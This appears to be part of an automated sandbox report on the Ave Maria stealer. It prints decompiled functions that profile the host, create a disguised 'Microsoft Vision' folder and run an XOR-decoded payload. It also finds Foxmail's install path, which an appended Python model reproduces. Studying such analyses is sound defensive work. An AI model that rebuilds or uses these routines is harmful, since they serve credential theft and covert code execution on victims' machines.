                                                                    • Opcode Fuzzy Hash: 7b096d1ae813de5a11d7bd3bc01f5e9eab5b3330bf7c90b6959ea4c9cbf75557
                                                                    • Instruction Fuzzy Hash: 94419375A00218EFCB21DF9A9CC09AEBBF8EB89314F10057BF404B7291D6795A41DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E02D12CEC(void* __ecx, void* __edx, void* __eflags) {
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				char _v24;
                                                                    				char _v76;
                                                                    				char _v344;
                                                                    				short _v864;
                                                                    				void* __edi;
                                                                    				void* _t28;
                                                                    				void* _t32;
                                                                    				void* _t35;
                                                                    				void* _t36;
                                                                    				void* _t37;
                                                                    				void* _t54;
                                                                    				void* _t75;
                                                                    				void* _t76;
                                                                    				void* _t81;
                                                                    				void* _t82;
                                                                    				void* _t84;
                                                                    
                                                                    				_t84 = __eflags;
                                                                    				_t54 = __ecx;
                                                                    				_t76 = __edx;
                                                                    				E02D1F80E(E02D1F93F( &_v24, __edx),  &_v20);
                                                                    				GetModuleFileNameA(0,  &_v344, 0x104);
                                                                    				_v16 = 0;
                                                                    				_t28 = E02D21E21( &_v344,  &_v16);
                                                                    				_v12 = 0;
                                                                    				E02D21BF8(_t28, _v16, 0x10ad,  &_v12);
                                                                    				_t82 = _t81 + 4;
                                                                    				E02D135E5(_t82, _v20);
                                                                    				E02D135E5(_t82, _v24);
                                                                    				_t32 = E02D1FA1F();
                                                                    				E02D135E5(_t82, 0x2d24648);
                                                                    				_t64 = _t82;
                                                                    				E02D1FC7E(_t82);
                                                                    				_t35 = E02D1FC58(_t82);
                                                                    				_t36 = E02D1FBFC();
                                                                    				_t37 = E02D1FA42();
                                                                    				E02D1FCB8(_t82, _v16);
                                                                    				E02D14F2B(_t54, E02D14241( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
                                                                    				E02D141FF( &_v76, _t76);
                                                                    				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
                                                                    					E02D11052( &_v864, 0, 0x208);
                                                                    					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
                                                                    					lstrcatW( &_v864, L"\\Microsoft Vision\\");
                                                                    					CreateDirectoryW( &_v864, 0);
                                                                    					E02D1990A(_t54, 1);
                                                                    					_v12 = 0x2d27524;
                                                                    					E02D14F2B(_t54,  &_v12);
                                                                    				}
                                                                    				E02D15EA5(_v20);
                                                                    				return E02D15EA5(_v24);
                                                                    			}

                                                                    0x02d12cec
                                                                    0x02d12cf7
                                                                    0x02d12cfd
                                                                    0x02d12d07
                                                                    0x02d12d1b
                                                                    0x02d12d24
                                                                    0x02d12d2d
                                                                    0x02d12d40
                                                                    0x02d12d43
                                                                    0x02d12d4b
                                                                    0x02d12d53
                                                                    0x02d12d5c
                                                                    0x02d12d61
                                                                    0x02d12d72
                                                                    0x02d12d78
                                                                    0x02d12d7a
                                                                    0x02d12d7f
                                                                    0x02d12d85
                                                                    0x02d12d8b
                                                                    0x02d12d9a
                                                                    0x02d12daa
                                                                    0x02d12db2
                                                                    0x02d12dbc
                                                                    0x02d12dcb
                                                                    0x02d12ddf
                                                                    0x02d12df1
                                                                    0x02d12dff
                                                                    0x02d12e08
                                                                    0x02d12e10
                                                                    0x02d12e1a
                                                                    0x02d12e1a
                                                                    0x02d12e22
                                                                    0x02d12e33

                                                                    APIs
                                                                      • Part of subcall function 02D1F80E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02D1F825
                                                                      • Part of subcall function 02D1F80E: CoInitialize.OLE32(00000000), ref: 02D1F82C
                                                                      • Part of subcall function 02D1F80E: CoCreateInstance.OLE32(02D24490,00000000,00000017,02D26E60,?,?,?,?,?,?,?,?,?,02D12D0C), ref: 02D1F84A
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D12D1B
                                                                      • Part of subcall function 02D21E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                      • Part of subcall function 02D21E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                      • Part of subcall function 02D21E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                      • Part of subcall function 02D21E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1FA1F: GlobalMemoryStatusEx.KERNEL32(?), ref: 02D1FA30
                                                                      • Part of subcall function 02D1FC7E: GetComputerNameW.KERNEL32 ref: 02D1FCA1
                                                                      • Part of subcall function 02D1FC58: GetCurrentProcess.KERNEL32(?,?,02D12D84,?,02D24648,?,?,00000000,?,?,?), ref: 02D1FC5C
                                                                      • Part of subcall function 02D1FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                      • Part of subcall function 02D1FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                      • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                      • Part of subcall function 02D1FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                      • Part of subcall function 02D1FA42: LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1FA5A
                                                                      • Part of subcall function 02D1FA42: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1FA6A
                                                                      • Part of subcall function 02D1FCB8: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 02D1FCFC
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 02D12DDF
                                                                    • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 02D12DF1
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 02D12DFF
                                                                      • Part of subcall function 02D1990A: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19916
                                                                      • Part of subcall function 02D1990A: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D1992D
                                                                      • Part of subcall function 02D1990A: EnterCriticalSection.KERNEL32(02E5DB10,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19939
                                                                      • Part of subcall function 02D1990A: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19949
                                                                      • Part of subcall function 02D1990A: LeaveCriticalSection.KERNEL32(02E5DB10,?,00000000), ref: 02D1999C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalFileSection$CreateInitializeProcess$ChangeCloseCurrentFindModuleNameNotificationOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                                                    • String ID: \Microsoft Vision\
                                                                    • API String ID: 3023051892-1618823865
                                                                    • Opcode ID: 15cfd73bc9b6773c04911288bfd4146eb6c72944ff06ba75a6a220c289a68f12
                                                                    • Instruction ID: 1139c8780acbe8946ad5eead13a9ca46169020b9cd5106431e79615491cfc17c
                                                                    • Opcode Fuzzy Hash: 15cfd73bc9b6773c04911288bfd4146eb6c72944ff06ba75a6a220c289a68f12
                                                                    • Instruction Fuzzy Hash: 90313EB1A00218BBDB14FBA0EC95DEEB77EEF54305F404465A505A2B80DA749E498FB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040A5C5,?,?,0054C400,00000000,?,0040A6F0,00000004,InitializeCriticalSectionEx,004196A8,InitializeCriticalSectionEx,00000000), ref: 0040A593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 34359c6363ad398c414f554c79b7176573ff717a0a3e1fd5e1a7425f226337bf
                                                                    • Instruction ID: 14e935a7b1eb0b49c324d93eda5382a4077dfcbf6f988bcf5186de8be7a15611
                                                                    • Opcode Fuzzy Hash: 34359c6363ad398c414f554c79b7176573ff717a0a3e1fd5e1a7425f226337bf
                                                                    • Instruction Fuzzy Hash: B811C432E41724BBCB224B689C40B9A37A4BB05760F254172E901BB2D0D778ED1086DF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E02D20B2A(void* __ecx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				intOrPtr _v40;
                                                                    				char _v44;
                                                                    				void* _t15;
                                                                    				intOrPtr* _t16;
                                                                    				intOrPtr _t34;
                                                                    				void* _t45;
                                                                    
                                                                    				_t45 = __eflags;
                                                                    				_t15 = E02D2094E();
                                                                    				_push(__ecx);
                                                                    				_t16 = E02D20969(_t15, "VirtualQuery", _t45);
                                                                    				if(_t16 != 0) {
                                                                    					_t16 =  *_t16(E02D20B2A,  &_v44, 0x1c);
                                                                    					_t34 = _v40;
                                                                    					_t47 = _t34;
                                                                    					if(_t34 != 0) {
                                                                    						E02D207C4(_t34, _t47);
                                                                    						MessageBoxA(0, "Bla2", "Bla2", 0);
                                                                    						_push(_t34);
                                                                    						_v12 = 0;
                                                                    						E02D20BD9( &_v16, _t47, E02D135E5( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
                                                                    						E02D15EA5(_v8);
                                                                    						_v8 = 0;
                                                                    						E02D15EA5(0);
                                                                    						_push(0);
                                                                    						_v12 = 0;
                                                                    						E02D20BD9( &_v16, _t47, E02D135E5( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
                                                                    						E02D15EA5(_v8);
                                                                    						_v8 = 0;
                                                                    						return E02D15EA5(0);
                                                                    					}
                                                                    				}
                                                                    				return _t16;
                                                                    			}

                                                                    Addresses: 0x02d20b2a, 0x02d20b31, 0x02d20b36, 0x02d20b3e, 0x02d20b46, 0x02d20b57, 0x02d20b59, 0x02d20b5c, 0x02d20b5e, 0x02d20b60, 0x02d20b70, 0x02d20b76, 0x02d20b7a, 0x02d20b8f, 0x02d20b97, 0x02d20b9e, 0x02d20ba1, 0x02d20ba6, 0x02d20baa, 0x02d20bbf, 0x02d20bc7, 0x02d20bce, 0x00000000, 0x02d20bd1, 0x02d20b5e, 0x02d20bd8

                                                                    APIs
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    • MessageBoxA.USER32 ref: 02D20B70
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D20BD9: CreateProcessW.KERNEL32 ref: 02D20C14
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 02D20BAE
                                                                    • Bla2, xrefs: 02D20B67, 02D20B6D, 02D20B6E
                                                                    • VirtualQuery, xrefs: 02D20B37
                                                                    • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 02D20B7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                                                    • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                                                    • API String ID: 1196126833-2308542105
                                                                    • Opcode ID: 034903eec32873d01467a910f0d2c70a654d0f22fb6d257b05b09f1e4c31725e
                                                                    • Instruction ID: 91af630c493fd8367a9c2497205c211db967b2582fac653e3c0b657c1b470114
                                                                    • Opcode Fuzzy Hash: 034903eec32873d01467a910f0d2c70a654d0f22fb6d257b05b09f1e4c31725e
                                                                    • Instruction Fuzzy Hash: C2111F71900128FAEB18EBA0ED55CEFB77DDE64718F10405AA402B2780EB359F08CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E02D21936(void* __ecx) {
                                                                    				long _v8;
                                                                    				void* _t7;
                                                                    				void* _t17;
                                                                    				void* _t24;
                                                                    				void* _t26;
                                                                    				WCHAR* _t31;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t17 = __ecx;
                                                                    				_t26 = E02D11085(0x800);
                                                                    				_t24 = _t26;
                                                                    				_t7 = 0x601;
                                                                    				do {
                                                                    					 *_t24 =  *(0x2d26070 + _t24) ^ 0x00000045;
                                                                    					_t24 = _t24 + 1;
                                                                    					_t7 = _t7 - 1;
                                                                    				} while (_t7 != 0);
                                                                    				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
                                                                    				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
                                                                    				GetWindowsDirectoryW(_t31, 0x104);
                                                                    				E02D1102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
                                                                    				_t5 = _t26 + 0xef; // 0xef
                                                                    				return  *_t5(_t31, _t17, 0, 0);
                                                                    			}

                                                                    Addresses: 0x02d21939, 0x02d21942, 0x02d21949, 0x02d21951, 0x02d21955, 0x02d2195a, 0x02d21960, 0x02d21962, 0x02d21963, 0x02d21963, 0x02d21974, 0x02d2198e, 0x02d21996, 0x02d219ae, 0x02d219b6, 0x02d219c8

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000), ref: 02D21974
                                                                    • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21988
                                                                    • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21996
                                                                    • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D219A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
                                                                    • String ID: \System32\cmd.exe
                                                                    • API String ID: 2244922440-2003734499
                                                                    • Opcode ID: b3d110efe045345dc61c6ab578f42624d21ef21848a29ef1076897366c8a96cb
                                                                    • Instruction ID: ccbed450807cf45a5f539eef0c8d8e55a7a7b62252c0b2d7d54ac16708b5b207
                                                                    • Opcode Fuzzy Hash: b3d110efe045345dc61c6ab578f42624d21ef21848a29ef1076897366c8a96cb
                                                                    • Instruction Fuzzy Hash: 68014771B803607BF2315674AC06FAB3B9CCBA5B05F100010FB09FA2C0C9A5AC0887E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32 ref: 004043A7
                                                                    • __Init_thread_footer.LIBCMT ref: 004043D2
                                                                      • Part of subcall function 004074B6: RtlEnterCriticalSection.NTDLL(0054C04C), ref: 004074C1
                                                                      • Part of subcall function 004074B6: RtlLeaveCriticalSection.NTDLL(0054C04C), ref: 004074FE
                                                                    • __Init_thread_footer.LIBCMT ref: 00404444
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalInit_thread_footerSection$EnterHeapLeaveProcess
                                                                    • String ID: @*@$p @
                                                                    • API String ID: 3363689876-3210404117
                                                                    • Opcode ID: 6e054b225e5f8cd3501d5ee45ea0ff7e5f34b07e5590dcdb31fc8f303aa08684
                                                                    • Instruction ID: f5f7a7e6d0e508ada8a5e7d71b1f1f1a8fee1ac4979172b9665fec8551eabba9
                                                                    • Opcode Fuzzy Hash: 6e054b225e5f8cd3501d5ee45ea0ff7e5f34b07e5590dcdb31fc8f303aa08684
                                                                    • Instruction Fuzzy Hash: D71151B5904240EAF3109B38AC857C53BA0B72631CF50056AE94D522E2D778A54DAF1B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1CE83(void* __ecx) {
                                                                    				void* _t13;
                                                                    				void* _t25;
                                                                    
                                                                    				_t25 = __ecx;
                                                                    				if(__ecx != 0) {
                                                                    					if( *(__ecx + 0x30) != 0) {
                                                                    						LocalFree( *(__ecx + 0x30));
                                                                    					}
                                                                    					if( *(_t25 + 0x40) != 0) {
                                                                    						LocalFree( *(_t25 + 0x40));
                                                                    					}
                                                                    					if( *(_t25 + 0x48) != 0) {
                                                                    						LocalFree( *(_t25 + 0x48));
                                                                    					}
                                                                    					if( *(_t25 + 0x58) != 0) {
                                                                    						LocalFree( *(_t25 + 0x58));
                                                                    					}
                                                                    					if( *(_t25 + 0x60) != 0) {
                                                                    						LocalFree( *(_t25 + 0x60));
                                                                    					}
                                                                    					if( *(_t25 + 0x68) != 0) {
                                                                    						LocalFree( *(_t25 + 0x68));
                                                                    					}
                                                                    					return LocalFree(_t25);
                                                                    				}
                                                                    				return _t13;
                                                                    			}

                                                                    Addresses: 0x02d1ce84, 0x02d1ce88, 0x02d1ce95, 0x02d1ce9a, 0x02d1ce9a, 0x02d1cea0, 0x02d1cea5, 0x02d1cea5, 0x02d1ceab, 0x02d1ceb0, 0x02d1ceb0, 0x02d1ceb6, 0x02d1cebb, 0x02d1cebb, 0x02d1cec1, 0x02d1cec6, 0x02d1cec6, 0x02d1cecc, 0x02d1ced1, 0x02d1ced1, 0x00000000, 0x02d1ced6, 0x02d1ced8

                                                                    APIs
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CE9A
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEA5
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEB0
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEBB
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEC6
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CED1
                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,02D1CAF5), ref: 02D1CED4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 2826327444-0
                                                                    • Opcode ID: 993c00084aa44e6d3b0742306579e03b7ab6063b42a31713272cedc604495fc4
                                                                    • Instruction ID: b812d6aff7c34262fed6768cc17ad9b80336926648d08e9556fd031dab2b52ce
                                                                    • Opcode Fuzzy Hash: 993c00084aa44e6d3b0742306579e03b7ab6063b42a31713272cedc604495fc4
                                                                    • Instruction Fuzzy Hash: ECF0AF314A0B14ABD7366B25EC04767B6F1BF80319F06083ED58251E708775AC95DF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D19D9A(void* __ecx) {
                                                                    				int _v8;
                                                                    				void* _v12;
                                                                    				void* _t7;
                                                                    
                                                                    				// 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ: locate the Foxmail installation through its per-user key
                                                                    				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
                                                                    					L3:
                                                                    					_t7 = 0;
                                                                    				} else {
                                                                    					_v8 = 0x104; // MAX_PATH bytes available in the global buffer at 0x2d297b0
                                                                    					// lpType is NULL, so the value type is never checked; a value that does not fit in 0x104 bytes fails with ERROR_MORE_DATA and the function returns 0
                                                                    					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x2d297b0,  &_v8) != 0) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						PathRemoveFileSpecA(0x2d297b0); // strip the trailing file name component, leaving the Foxmail directory in the global buffer
                                                                    						_t7 = 1;
                                                                    					}
                                                                    				}
                                                                    				return _t7; // 1 when the directory was found; note the opened key handle is never closed
                                                                    			}
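                                                                    What E02D19D9A computes, as an added Python example written for this page (it is not code from the report or from the sample): the registry is replaced by a dict snapshot so it runs without Windows, path_remove_file_spec reproduces the PathRemoveFileSpecA behaviour the function relies on, and the 0x104-byte buffer limit is kept so the failure case is visible. The key and value names are the ones the decompilation uses; every path in the snapshot is constructed.

```python
"""
Added example (not from the report or the sample): model of E02D19D9A with
the Win32 registry replaced by a dict so it runs anywhere.  Sample values
are constructed; key and value names are the ones the decompilation uses.
"""
from typing import Dict, Optional, Tuple

HKCU_KEY = r"software\Aerofox\FoxmailPreview"   # opened under HKEY_CURRENT_USER
VALUE_NAME = "Executable"
MAX_PATH = 0x104           # buffer size the sample passes to RegQueryValueExA
ERROR_SUCCESS = 0
ERROR_FILE_NOT_FOUND = 2   # key or value missing
ERROR_MORE_DATA = 234      # value does not fit the supplied buffer


def path_remove_file_spec(path: str) -> str:
    """Mimic PathRemoveFileSpecA: drop the last path component.
    'C:\\Foxmail\\Foxmail.exe' -> 'C:\\Foxmail'; the root of 'C:\\Foxmail'
    stays 'C:\\'; a bare file name becomes the empty string."""
    idx = path.rfind("\\")
    if idx < 0:
        return ""
    if idx == 0 or (idx == 2 and path[1] == ":"):   # keep the root backslash
        return path[: idx + 1]
    return path[:idx]


def reg_query_value_ex_a(hive: Dict[str, Dict[str, str]], key: str, name: str,
                         buf_size: int) -> Tuple[int, Optional[str]]:
    """Report a REG_SZ read the way RegQueryValueExA does: cbData counts the
    terminating NUL, so a string needs len + 1 bytes of buffer (ANSI assumed)."""
    values = hive.get(key.lower())            # registry key names are case-insensitive
    if values is None or name not in values:
        return ERROR_FILE_NOT_FOUND, None
    value = values[name]
    if len(value) + 1 > buf_size:
        return ERROR_MORE_DATA, None
    return ERROR_SUCCESS, value


def foxmail_install_dir(hive: Dict[str, Dict[str, str]]) -> Optional[str]:
    """Equivalent of E02D19D9A: the Foxmail directory, or None wherever the
    sample returns 0 (key missing, value missing, value too long)."""
    status, exe = reg_query_value_ex_a(hive, HKCU_KEY, VALUE_NAME, MAX_PATH)
    if status != ERROR_SUCCESS:
        return None
    return path_remove_file_spec(exe)


# Constructed HKCU snapshot: one host with Foxmail registered, path is made up.
SAMPLE_HIVE = {
    HKCU_KEY.lower(): {VALUE_NAME: r"C:\Program Files (x86)\Foxmail\Foxmail.exe"},
}

if __name__ == "__main__":
    print(foxmail_install_dir(SAMPLE_HIVE))   # C:\Program Files (x86)\Foxmail
    print(foxmail_install_dir({}))            # None: no Foxmail on this host
```

                                                                    On a real host the same lookup is a two-line winreg call; the point of the model is the two ways the sample silently gives up, a missing key or value, and a path of 0x104 bytes or more, which RegQueryValueExA rejects with ERROR_MORE_DATA.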

